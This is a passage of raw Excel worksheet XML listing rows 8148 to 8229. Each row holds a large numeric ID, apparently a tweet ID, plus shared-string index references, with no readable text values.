      </c>
      <c r="B8148" t="s">
        <v>19693</v>
      </c>
      <c r="C8148" t="s">
        <v>1</v>
      </c>
      <c r="D8148" t="s">
        <v>19694</v>
      </c>
      <c r="E8148" t="s">
        <v>19695</v>
      </c>
    </row>
    <row r="8149" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8149">
        <v>1.23291884634605E+18</v>
      </c>
      <c r="B8149" t="s">
        <v>19696</v>
      </c>
      <c r="C8149" t="s">
        <v>1</v>
      </c>
      <c r="D8149" t="s">
        <v>19697</v>
      </c>
      <c r="E8149" t="s">
        <v>19698</v>
      </c>
    </row>
    <row r="8150" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8150">
        <v>1.2329183017113101E+18</v>
      </c>
      <c r="B8150" t="s">
        <v>19699</v>
      </c>
      <c r="C8150" t="s">
        <v>1</v>
      </c>
      <c r="D8150" t="s">
        <v>19700</v>
      </c>
      <c r="E8150" t="s">
        <v>19701</v>
      </c>
    </row>
    <row r="8151" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8151">
        <v>1.2329179479303401E+18</v>
      </c>
      <c r="B8151" t="s">
        <v>19702</v>
      </c>
      <c r="C8151" t="s">
        <v>1</v>
      </c>
      <c r="D8151" t="s">
        <v>19703</v>
      </c>
      <c r="E8151" t="s">
        <v>659</v>
      </c>
    </row>
    <row r="8152" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8152">
        <v>1.2329179251214899E+18</v>
      </c>
      <c r="B8152" t="s">
        <v>19704</v>
      </c>
      <c r="C8152" t="s">
        <v>1</v>
      </c>
      <c r="D8152" t="s">
        <v>19705</v>
      </c>
      <c r="E8152" t="s">
        <v>19706</v>
      </c>
    </row>
    <row r="8153" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8153">
        <v>1.2329175295399301E+18</v>
      </c>
      <c r="B8153" t="s">
        <v>19707</v>
      </c>
      <c r="C8153" t="s">
        <v>1</v>
      </c>
      <c r="D8153" t="s">
        <v>19708</v>
      </c>
      <c r="E8153" t="s">
        <v>18903</v>
      </c>
    </row>
    <row r="8154" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8154">
        <v>1.23291752860898E+18</v>
      </c>
      <c r="B8154" t="s">
        <v>19709</v>
      </c>
      <c r="C8154" t="s">
        <v>1</v>
      </c>
      <c r="D8154" t="s">
        <v>19710</v>
      </c>
      <c r="E8154" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="8155" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8155">
        <v>1.2329166538615601E+18</v>
      </c>
      <c r="B8155" t="s">
        <v>19711</v>
      </c>
      <c r="C8155" t="s">
        <v>1</v>
      </c>
      <c r="D8155" t="s">
        <v>19712</v>
      </c>
      <c r="E8155" t="s">
        <v>19713</v>
      </c>
    </row>
    <row r="8156" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8156">
        <v>1.2329163128061E+18</v>
      </c>
      <c r="B8156" t="s">
        <v>19714</v>
      </c>
      <c r="C8156" t="s">
        <v>1</v>
      </c>
      <c r="D8156" t="s">
        <v>19715</v>
      </c>
      <c r="E8156" t="s">
        <v>19211</v>
      </c>
    </row>
    <row r="8157" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8157">
        <v>1.2329160679215501E+18</v>
      </c>
      <c r="B8157" t="s">
        <v>19716</v>
      </c>
      <c r="C8157" t="s">
        <v>1</v>
      </c>
      <c r="D8157" t="s">
        <v>19717</v>
      </c>
      <c r="E8157" t="s">
        <v>6690</v>
      </c>
    </row>
    <row r="8158" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8158">
        <v>1.2329159450537001E+18</v>
      </c>
      <c r="B8158" t="s">
        <v>19718</v>
      </c>
      <c r="C8158" t="s">
        <v>1</v>
      </c>
      <c r="D8158" t="s">
        <v>19719</v>
      </c>
      <c r="E8158" t="s">
        <v>17103</v>
      </c>
    </row>
    <row r="8159" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8159">
        <v>1.2329158090701701E+18</v>
      </c>
      <c r="B8159" t="s">
        <v>19720</v>
      </c>
      <c r="C8159" t="s">
        <v>1</v>
      </c>
      <c r="D8159" t="s">
        <v>19721</v>
      </c>
      <c r="E8159" t="s">
        <v>4228</v>
      </c>
    </row>
    <row r="8160" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8160">
        <v>1.2329157811989299E+18</v>
      </c>
      <c r="B8160" t="s">
        <v>19722</v>
      </c>
      <c r="C8160" t="s">
        <v>1</v>
      </c>
      <c r="D8160" t="s">
        <v>19723</v>
      </c>
      <c r="E8160" t="s">
        <v>19724</v>
      </c>
    </row>
    <row r="8161" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8161">
        <v>1.2329155872082601E+18</v>
      </c>
      <c r="B8161" t="s">
        <v>19725</v>
      </c>
      <c r="C8161" t="s">
        <v>1</v>
      </c>
      <c r="D8161" t="s">
        <v>19726</v>
      </c>
      <c r="E8161" t="s">
        <v>19211</v>
      </c>
    </row>
    <row r="8162" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8162">
        <v>1.2329150746307599E+18</v>
      </c>
      <c r="B8162" t="s">
        <v>19727</v>
      </c>
      <c r="C8162" t="s">
        <v>1</v>
      </c>
      <c r="D8162" t="s">
        <v>19728</v>
      </c>
      <c r="E8162" t="s">
        <v>19211</v>
      </c>
    </row>
    <row r="8163" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8163">
        <v>1.2329149335343301E+18</v>
      </c>
      <c r="B8163" t="s">
        <v>19729</v>
      </c>
      <c r="C8163" t="s">
        <v>1</v>
      </c>
      <c r="D8163" t="s">
        <v>19730</v>
      </c>
      <c r="E8163" t="s">
        <v>19211</v>
      </c>
    </row>
    <row r="8164" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8164">
        <v>1.23291477462897E+18</v>
      </c>
      <c r="B8164" t="s">
        <v>19731</v>
      </c>
      <c r="C8164" t="s">
        <v>1</v>
      </c>
      <c r="D8164" t="s">
        <v>19732</v>
      </c>
      <c r="E8164" t="s">
        <v>19733</v>
      </c>
    </row>
    <row r="8165" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8165">
        <v>1.2329120534902799E+18</v>
      </c>
      <c r="B8165" t="s">
        <v>19734</v>
      </c>
      <c r="C8165" t="s">
        <v>1</v>
      </c>
      <c r="D8165" t="s">
        <v>19735</v>
      </c>
      <c r="E8165" t="s">
        <v>2638</v>
      </c>
    </row>
    <row r="8166" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8166">
        <v>1.2329120073069199E+18</v>
      </c>
      <c r="B8166" t="s">
        <v>19736</v>
      </c>
      <c r="C8166" t="s">
        <v>1</v>
      </c>
      <c r="D8166" t="s">
        <v>19737</v>
      </c>
      <c r="E8166" t="s">
        <v>19188</v>
      </c>
    </row>
    <row r="8167" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8167">
        <v>1.2329115515955599E+18</v>
      </c>
      <c r="B8167" t="s">
        <v>19738</v>
      </c>
      <c r="C8167" t="s">
        <v>1</v>
      </c>
      <c r="D8167" t="s">
        <v>19739</v>
      </c>
      <c r="E8167" t="s">
        <v>12227</v>
      </c>
    </row>
    <row r="8168" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8168">
        <v>1.23291113331875E+18</v>
      </c>
      <c r="B8168" t="s">
        <v>19740</v>
      </c>
      <c r="C8168" t="s">
        <v>1</v>
      </c>
      <c r="D8168" t="s">
        <v>19741</v>
      </c>
      <c r="E8168" t="s">
        <v>19742</v>
      </c>
    </row>
    <row r="8169" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8169">
        <v>1.23290888199251E+18</v>
      </c>
      <c r="B8169" t="s">
        <v>19743</v>
      </c>
      <c r="C8169" t="s">
        <v>1</v>
      </c>
      <c r="D8169" t="s">
        <v>19744</v>
      </c>
      <c r="E8169" t="s">
        <v>19745</v>
      </c>
    </row>
    <row r="8170" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8170">
        <v>1.2329084167226199E+18</v>
      </c>
      <c r="B8170" t="s">
        <v>19746</v>
      </c>
      <c r="C8170" t="s">
        <v>1</v>
      </c>
      <c r="D8170" t="s">
        <v>19747</v>
      </c>
      <c r="E8170" t="s">
        <v>19748</v>
      </c>
    </row>
    <row r="8171" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8171">
        <v>1.23290832568528E+18</v>
      </c>
      <c r="B8171" t="s">
        <v>19749</v>
      </c>
      <c r="C8171" t="s">
        <v>1</v>
      </c>
      <c r="D8171" t="s">
        <v>19750</v>
      </c>
      <c r="E8171" t="s">
        <v>19751</v>
      </c>
    </row>
    <row r="8172" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8172">
        <v>1.23290830004946E+18</v>
      </c>
      <c r="B8172" t="s">
        <v>19752</v>
      </c>
      <c r="C8172" t="s">
        <v>1</v>
      </c>
      <c r="D8172" t="s">
        <v>19753</v>
      </c>
      <c r="E8172" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="8173" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8173">
        <v>1.2329082408512499E+18</v>
      </c>
      <c r="B8173" t="s">
        <v>19754</v>
      </c>
      <c r="C8173" t="s">
        <v>1</v>
      </c>
      <c r="D8173" t="s">
        <v>19755</v>
      </c>
      <c r="E8173" t="s">
        <v>17124</v>
      </c>
    </row>
    <row r="8174" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8174">
        <v>1.2329082216663199E+18</v>
      </c>
      <c r="B8174" t="s">
        <v>19756</v>
      </c>
      <c r="C8174" t="s">
        <v>1</v>
      </c>
      <c r="D8174" t="s">
        <v>19757</v>
      </c>
      <c r="E8174" t="s">
        <v>19758</v>
      </c>
    </row>
    <row r="8175" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8175">
        <v>1.2329081972891699E+18</v>
      </c>
      <c r="B8175" t="s">
        <v>19759</v>
      </c>
      <c r="C8175" t="s">
        <v>1</v>
      </c>
      <c r="D8175" t="s">
        <v>19760</v>
      </c>
      <c r="E8175" t="s">
        <v>9868</v>
      </c>
    </row>
    <row r="8176" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8176">
        <v>1.2329048102293499E+18</v>
      </c>
      <c r="B8176" t="s">
        <v>19761</v>
      </c>
      <c r="C8176" t="s">
        <v>1</v>
      </c>
      <c r="D8176" t="s">
        <v>19762</v>
      </c>
      <c r="E8176" t="s">
        <v>19763</v>
      </c>
    </row>
    <row r="8177" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8177">
        <v>1.23290458436589E+18</v>
      </c>
      <c r="B8177" t="s">
        <v>19764</v>
      </c>
      <c r="C8177" t="s">
        <v>1</v>
      </c>
      <c r="D8177" t="s">
        <v>19765</v>
      </c>
      <c r="E8177" t="s">
        <v>19766</v>
      </c>
    </row>
    <row r="8178" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8178">
        <v>1.23290354541585E+18</v>
      </c>
      <c r="B8178" t="s">
        <v>19767</v>
      </c>
      <c r="C8178" t="s">
        <v>1</v>
      </c>
      <c r="D8178" t="s">
        <v>19768</v>
      </c>
      <c r="E8178" t="s">
        <v>19769</v>
      </c>
    </row>
    <row r="8179" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8179">
        <v>1.23290236597775E+18</v>
      </c>
      <c r="B8179" t="s">
        <v>19770</v>
      </c>
      <c r="C8179" t="s">
        <v>1</v>
      </c>
      <c r="D8179" t="s">
        <v>19771</v>
      </c>
      <c r="E8179" t="s">
        <v>7334</v>
      </c>
    </row>
    <row r="8180" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8180">
        <v>1.2329011818292301E+18</v>
      </c>
      <c r="B8180" t="s">
        <v>19772</v>
      </c>
      <c r="C8180" t="s">
        <v>1</v>
      </c>
      <c r="D8180" t="s">
        <v>19773</v>
      </c>
      <c r="E8180" t="s">
        <v>19774</v>
      </c>
    </row>
    <row r="8181" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8181">
        <v>1.23290077207907E+18</v>
      </c>
      <c r="B8181" t="s">
        <v>19775</v>
      </c>
      <c r="C8181" t="s">
        <v>1</v>
      </c>
      <c r="D8181" t="s">
        <v>19776</v>
      </c>
      <c r="E8181" t="s">
        <v>6757</v>
      </c>
    </row>
    <row r="8182" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8182">
        <v>1.2329006738109701E+18</v>
      </c>
      <c r="B8182" t="s">
        <v>19777</v>
      </c>
      <c r="C8182" t="s">
        <v>1</v>
      </c>
      <c r="D8182" t="s">
        <v>19778</v>
      </c>
      <c r="E8182" t="s">
        <v>13606</v>
      </c>
    </row>
    <row r="8183" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8183">
        <v>1.2329006159503501E+18</v>
      </c>
      <c r="B8183" t="s">
        <v>19779</v>
      </c>
      <c r="C8183" t="s">
        <v>1</v>
      </c>
      <c r="D8183" t="s">
        <v>19780</v>
      </c>
      <c r="E8183" t="s">
        <v>3771</v>
      </c>
    </row>
    <row r="8184" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8184">
        <v>1.2328998193639401E+18</v>
      </c>
      <c r="B8184" t="s">
        <v>19781</v>
      </c>
      <c r="C8184" t="s">
        <v>1</v>
      </c>
      <c r="D8184" t="s">
        <v>19782</v>
      </c>
      <c r="E8184" t="s">
        <v>19093</v>
      </c>
    </row>
    <row r="8185" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8185">
        <v>1.2328944479370801E+18</v>
      </c>
      <c r="B8185" t="s">
        <v>19783</v>
      </c>
      <c r="C8185" t="s">
        <v>1</v>
      </c>
      <c r="D8185" t="s">
        <v>19784</v>
      </c>
      <c r="E8185" t="s">
        <v>649</v>
      </c>
    </row>
    <row r="8186" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8186">
        <v>1.23289354296125E+18</v>
      </c>
      <c r="B8186" t="s">
        <v>19785</v>
      </c>
      <c r="C8186" t="s">
        <v>1</v>
      </c>
      <c r="D8186" t="s">
        <v>19786</v>
      </c>
      <c r="E8186" t="s">
        <v>19787</v>
      </c>
    </row>
    <row r="8187" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8187">
        <v>1.23289314070669E+18</v>
      </c>
      <c r="B8187" t="s">
        <v>19788</v>
      </c>
      <c r="C8187" t="s">
        <v>1</v>
      </c>
      <c r="D8187" t="s">
        <v>19789</v>
      </c>
      <c r="E8187" t="s">
        <v>19790</v>
      </c>
    </row>
    <row r="8188" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8188">
        <v>1.2328931207041101E+18</v>
      </c>
      <c r="B8188" t="s">
        <v>19791</v>
      </c>
      <c r="C8188" t="s">
        <v>1</v>
      </c>
      <c r="D8188" t="s">
        <v>19792</v>
      </c>
      <c r="E8188" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="8189" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8189">
        <v>1.2328925230409001E+18</v>
      </c>
      <c r="B8189" t="s">
        <v>19793</v>
      </c>
      <c r="C8189" t="s">
        <v>1</v>
      </c>
      <c r="D8189" t="s">
        <v>814</v>
      </c>
      <c r="E8189" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="8190" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8190">
        <v>1.2328912867824599E+18</v>
      </c>
      <c r="B8190" t="s">
        <v>19794</v>
      </c>
      <c r="C8190" t="s">
        <v>1</v>
      </c>
      <c r="D8190" t="s">
        <v>19795</v>
      </c>
      <c r="E8190" t="s">
        <v>19796</v>
      </c>
    </row>
    <row r="8191" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8191">
        <v>1.2328905948479601E+18</v>
      </c>
      <c r="B8191" t="s">
        <v>19797</v>
      </c>
      <c r="C8191" t="s">
        <v>1</v>
      </c>
      <c r="D8191" t="s">
        <v>19798</v>
      </c>
      <c r="E8191" t="s">
        <v>19799</v>
      </c>
    </row>
    <row r="8192" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8192">
        <v>1.23289017449491E+18</v>
      </c>
      <c r="B8192" t="s">
        <v>19800</v>
      </c>
      <c r="C8192" t="s">
        <v>1</v>
      </c>
      <c r="D8192" t="s">
        <v>19801</v>
      </c>
      <c r="E8192" t="s">
        <v>19802</v>
      </c>
    </row>
    <row r="8193" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8193">
        <v>1.23288962359394E+18</v>
      </c>
      <c r="B8193" t="s">
        <v>19803</v>
      </c>
      <c r="C8193" t="s">
        <v>1</v>
      </c>
      <c r="D8193" t="s">
        <v>19804</v>
      </c>
      <c r="E8193" t="s">
        <v>19805</v>
      </c>
    </row>
    <row r="8194" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8194">
        <v>1.2328891804573499E+18</v>
      </c>
      <c r="B8194" t="s">
        <v>19806</v>
      </c>
      <c r="C8194" t="s">
        <v>1</v>
      </c>
      <c r="D8194" t="s">
        <v>19807</v>
      </c>
      <c r="E8194" t="s">
        <v>9762</v>
      </c>
    </row>
    <row r="8195" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8195">
        <v>1.2328886737979799E+18</v>
      </c>
      <c r="B8195" t="s">
        <v>19808</v>
      </c>
      <c r="C8195" t="s">
        <v>1</v>
      </c>
      <c r="D8195" t="s">
        <v>19809</v>
      </c>
      <c r="E8195" t="s">
        <v>19810</v>
      </c>
    </row>
    <row r="8196" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8196">
        <v>1.2328885527463501E+18</v>
      </c>
      <c r="B8196" t="s">
        <v>19811</v>
      </c>
      <c r="C8196" t="s">
        <v>1</v>
      </c>
      <c r="D8196" t="s">
        <v>19812</v>
      </c>
      <c r="E8196" t="s">
        <v>19813</v>
      </c>
    </row>
    <row r="8197" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8197">
        <v>1.23288829854637E+18</v>
      </c>
      <c r="B8197" t="s">
        <v>19814</v>
      </c>
      <c r="C8197" t="s">
        <v>1</v>
      </c>
      <c r="D8197" t="s">
        <v>19815</v>
      </c>
      <c r="E8197" t="s">
        <v>13174</v>
      </c>
    </row>
    <row r="8198" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8198">
        <v>1.23288762081377E+18</v>
      </c>
      <c r="B8198" t="s">
        <v>19816</v>
      </c>
      <c r="C8198" t="s">
        <v>1</v>
      </c>
      <c r="D8198" t="s">
        <v>19817</v>
      </c>
      <c r="E8198" t="s">
        <v>13641</v>
      </c>
    </row>
    <row r="8199" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8199">
        <v>1.23288747242768E+18</v>
      </c>
      <c r="B8199" t="s">
        <v>19818</v>
      </c>
      <c r="C8199" t="s">
        <v>1</v>
      </c>
      <c r="D8199" t="s">
        <v>19819</v>
      </c>
      <c r="E8199" t="s">
        <v>9841</v>
      </c>
    </row>
    <row r="8200" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8200">
        <v>1.2328872743600399E+18</v>
      </c>
      <c r="B8200" t="s">
        <v>19820</v>
      </c>
      <c r="C8200" t="s">
        <v>1</v>
      </c>
      <c r="D8200" t="s">
        <v>19821</v>
      </c>
      <c r="E8200" t="s">
        <v>13641</v>
      </c>
    </row>
    <row r="8201" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8201">
        <v>1.23288641217486E+18</v>
      </c>
      <c r="B8201" t="s">
        <v>19822</v>
      </c>
      <c r="C8201" t="s">
        <v>1</v>
      </c>
      <c r="D8201" t="s">
        <v>19823</v>
      </c>
      <c r="E8201" t="s">
        <v>19824</v>
      </c>
    </row>
    <row r="8202" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8202">
        <v>1.2328857719857101E+18</v>
      </c>
      <c r="B8202" t="s">
        <v>19825</v>
      </c>
      <c r="C8202" t="s">
        <v>1</v>
      </c>
      <c r="D8202" t="s">
        <v>19826</v>
      </c>
      <c r="E8202" t="s">
        <v>14977</v>
      </c>
    </row>
    <row r="8203" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8203">
        <v>1.23288556887218E+18</v>
      </c>
      <c r="B8203" t="s">
        <v>19827</v>
      </c>
      <c r="C8203" t="s">
        <v>1</v>
      </c>
      <c r="D8203" t="s">
        <v>19828</v>
      </c>
      <c r="E8203" t="s">
        <v>19829</v>
      </c>
    </row>
    <row r="8204" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8204">
        <v>1.23288542744863E+18</v>
      </c>
      <c r="B8204" t="s">
        <v>19830</v>
      </c>
      <c r="C8204" t="s">
        <v>1</v>
      </c>
      <c r="D8204" t="s">
        <v>19831</v>
      </c>
      <c r="E8204" t="s">
        <v>19832</v>
      </c>
    </row>
    <row r="8205" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8205">
        <v>1.23288323631485E+18</v>
      </c>
      <c r="B8205" t="s">
        <v>19833</v>
      </c>
      <c r="C8205" t="s">
        <v>1</v>
      </c>
      <c r="D8205" t="s">
        <v>19834</v>
      </c>
      <c r="E8205" t="s">
        <v>9859</v>
      </c>
    </row>
    <row r="8206" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8206">
        <v>1.2328828402594299E+18</v>
      </c>
      <c r="B8206" t="s">
        <v>19835</v>
      </c>
      <c r="C8206" t="s">
        <v>1</v>
      </c>
      <c r="D8206" t="s">
        <v>19836</v>
      </c>
      <c r="E8206" t="s">
        <v>9859</v>
      </c>
    </row>
    <row r="8207" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8207">
        <v>1.2328822929739599E+18</v>
      </c>
      <c r="B8207" t="s">
        <v>19837</v>
      </c>
      <c r="C8207" t="s">
        <v>1</v>
      </c>
      <c r="D8207" t="s">
        <v>19838</v>
      </c>
      <c r="E8207" t="s">
        <v>19839</v>
      </c>
    </row>
    <row r="8208" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8208">
        <v>1.2328815813599501E+18</v>
      </c>
      <c r="B8208" t="s">
        <v>19840</v>
      </c>
      <c r="C8208" t="s">
        <v>1</v>
      </c>
      <c r="D8208" t="s">
        <v>19841</v>
      </c>
      <c r="E8208" t="s">
        <v>12241</v>
      </c>
    </row>
    <row r="8209" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8209">
        <v>1.2328804262066801E+18</v>
      </c>
      <c r="B8209" t="s">
        <v>19842</v>
      </c>
      <c r="C8209" t="s">
        <v>1</v>
      </c>
      <c r="D8209" t="s">
        <v>19843</v>
      </c>
      <c r="E8209" t="s">
        <v>19844</v>
      </c>
    </row>
    <row r="8210" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8210">
        <v>1.23287962986354E+18</v>
      </c>
      <c r="B8210" t="s">
        <v>19845</v>
      </c>
      <c r="C8210" t="s">
        <v>1</v>
      </c>
      <c r="D8210" t="s">
        <v>19846</v>
      </c>
      <c r="E8210" t="s">
        <v>19847</v>
      </c>
    </row>
    <row r="8211" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8211">
        <v>1.2328796073109E+18</v>
      </c>
      <c r="B8211" t="s">
        <v>19848</v>
      </c>
      <c r="C8211" t="s">
        <v>1</v>
      </c>
      <c r="D8211" t="s">
        <v>19849</v>
      </c>
      <c r="E8211" t="s">
        <v>19850</v>
      </c>
    </row>
    <row r="8212" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8212">
        <v>1.2328787957884301E+18</v>
      </c>
      <c r="B8212" t="s">
        <v>19851</v>
      </c>
      <c r="C8212" t="s">
        <v>1</v>
      </c>
      <c r="D8212" t="s">
        <v>19852</v>
      </c>
      <c r="E8212" t="s">
        <v>19853</v>
      </c>
    </row>
    <row r="8213" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8213">
        <v>1.2328785108989E+18</v>
      </c>
      <c r="B8213" t="s">
        <v>19854</v>
      </c>
      <c r="C8213" t="s">
        <v>1</v>
      </c>
      <c r="D8213" t="s">
        <v>19855</v>
      </c>
      <c r="E8213" t="s">
        <v>19856</v>
      </c>
    </row>
    <row r="8214" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8214">
        <v>1.2328780525286001E+18</v>
      </c>
      <c r="B8214" t="s">
        <v>19857</v>
      </c>
      <c r="C8214" t="s">
        <v>1</v>
      </c>
      <c r="D8214" t="s">
        <v>19858</v>
      </c>
      <c r="E8214" t="s">
        <v>13748</v>
      </c>
    </row>
    <row r="8215" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8215">
        <v>1.23287781340705E+18</v>
      </c>
      <c r="B8215" t="s">
        <v>19859</v>
      </c>
      <c r="C8215" t="s">
        <v>1</v>
      </c>
      <c r="D8215" t="s">
        <v>19860</v>
      </c>
      <c r="E8215" t="s">
        <v>19861</v>
      </c>
    </row>
    <row r="8216" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8216">
        <v>1.2328775521898601E+18</v>
      </c>
      <c r="B8216" t="s">
        <v>19862</v>
      </c>
      <c r="C8216" t="s">
        <v>1</v>
      </c>
      <c r="D8216" t="s">
        <v>19863</v>
      </c>
      <c r="E8216" t="s">
        <v>5709</v>
      </c>
    </row>
    <row r="8217" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8217">
        <v>1.23287754791169E+18</v>
      </c>
      <c r="B8217" t="s">
        <v>19864</v>
      </c>
      <c r="C8217" t="s">
        <v>1</v>
      </c>
      <c r="D8217" t="s">
        <v>19865</v>
      </c>
      <c r="E8217" t="s">
        <v>5709</v>
      </c>
    </row>
    <row r="8218" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8218">
        <v>1.23287718881213E+18</v>
      </c>
      <c r="B8218" t="s">
        <v>19866</v>
      </c>
      <c r="C8218" t="s">
        <v>1</v>
      </c>
      <c r="D8218" t="s">
        <v>19867</v>
      </c>
      <c r="E8218" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="8219" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8219">
        <v>1.2328768614972401E+18</v>
      </c>
      <c r="B8219" t="s">
        <v>19868</v>
      </c>
      <c r="C8219" t="s">
        <v>1</v>
      </c>
      <c r="D8219" t="s">
        <v>19869</v>
      </c>
      <c r="E8219" t="s">
        <v>2909</v>
      </c>
    </row>
    <row r="8220" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8220">
        <v>1.2328766063661299E+18</v>
      </c>
      <c r="B8220" t="s">
        <v>19870</v>
      </c>
      <c r="C8220" t="s">
        <v>1</v>
      </c>
      <c r="D8220" t="s">
        <v>19871</v>
      </c>
      <c r="E8220" t="s">
        <v>2909</v>
      </c>
    </row>
    <row r="8221" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8221">
        <v>1.23287630055102E+18</v>
      </c>
      <c r="B8221" t="s">
        <v>19872</v>
      </c>
      <c r="C8221" t="s">
        <v>1</v>
      </c>
      <c r="D8221" t="s">
        <v>19873</v>
      </c>
      <c r="E8221" t="s">
        <v>2909</v>
      </c>
    </row>
    <row r="8222" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8222">
        <v>1.23287606197057E+18</v>
      </c>
      <c r="B8222" t="s">
        <v>19874</v>
      </c>
      <c r="C8222" t="s">
        <v>1</v>
      </c>
      <c r="D8222" t="s">
        <v>19875</v>
      </c>
      <c r="E8222" t="s">
        <v>2909</v>
      </c>
    </row>
    <row r="8223" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8223">
        <v>1.23287566673279E+18</v>
      </c>
      <c r="B8223" t="s">
        <v>19876</v>
      </c>
      <c r="C8223" t="s">
        <v>1</v>
      </c>
      <c r="D8223" t="s">
        <v>19877</v>
      </c>
      <c r="E8223" t="s">
        <v>19878</v>
      </c>
    </row>
    <row r="8224" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8224">
        <v>1.2328756271554601E+18</v>
      </c>
      <c r="B8224" t="s">
        <v>19879</v>
      </c>
      <c r="C8224" t="s">
        <v>1</v>
      </c>
      <c r="D8224" t="s">
        <v>19880</v>
      </c>
      <c r="E8224" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="8225" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8225">
        <v>1.23287558136624E+18</v>
      </c>
      <c r="B8225" t="s">
        <v>19881</v>
      </c>
      <c r="C8225" t="s">
        <v>1</v>
      </c>
      <c r="D8225" t="s">
        <v>19882</v>
      </c>
      <c r="E8225" t="s">
        <v>2909</v>
      </c>
    </row>
    <row r="8226" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8226">
        <v>1.2328752916403899E+18</v>
      </c>
      <c r="B8226" t="s">
        <v>19883</v>
      </c>
      <c r="C8226" t="s">
        <v>1</v>
      </c>
      <c r="D8226" t="s">
        <v>19884</v>
      </c>
      <c r="E8226" t="s">
        <v>19885</v>
      </c>
    </row>
    <row r="8227" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8227">
        <v>1.2328748253973499E+18</v>
      </c>
      <c r="B8227" t="s">
        <v>19886</v>
      </c>
      <c r="C8227" t="s">
        <v>1</v>
      </c>
      <c r="D8227" t="s">
        <v>19887</v>
      </c>
      <c r="E8227" t="s">
        <v>19888</v>
      </c>
    </row>
    <row r="8228" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8228">
        <v>1.2328747825149E+18</v>
      </c>
      <c r="B8228" t="s">
        <v>19889</v>
      </c>
      <c r="C8228" t="s">
        <v>1</v>
      </c>
      <c r="D8228" t="s">
        <v>19890</v>
      </c>
      <c r="E8228" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8229" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8229">
        <v>1.2328745400506399E+18</v>
      </c>
      <c r="B8229" t="s">
        <v>19891</v>
      </c>
      <c r="C8229" t="s">
        <v>1</v>
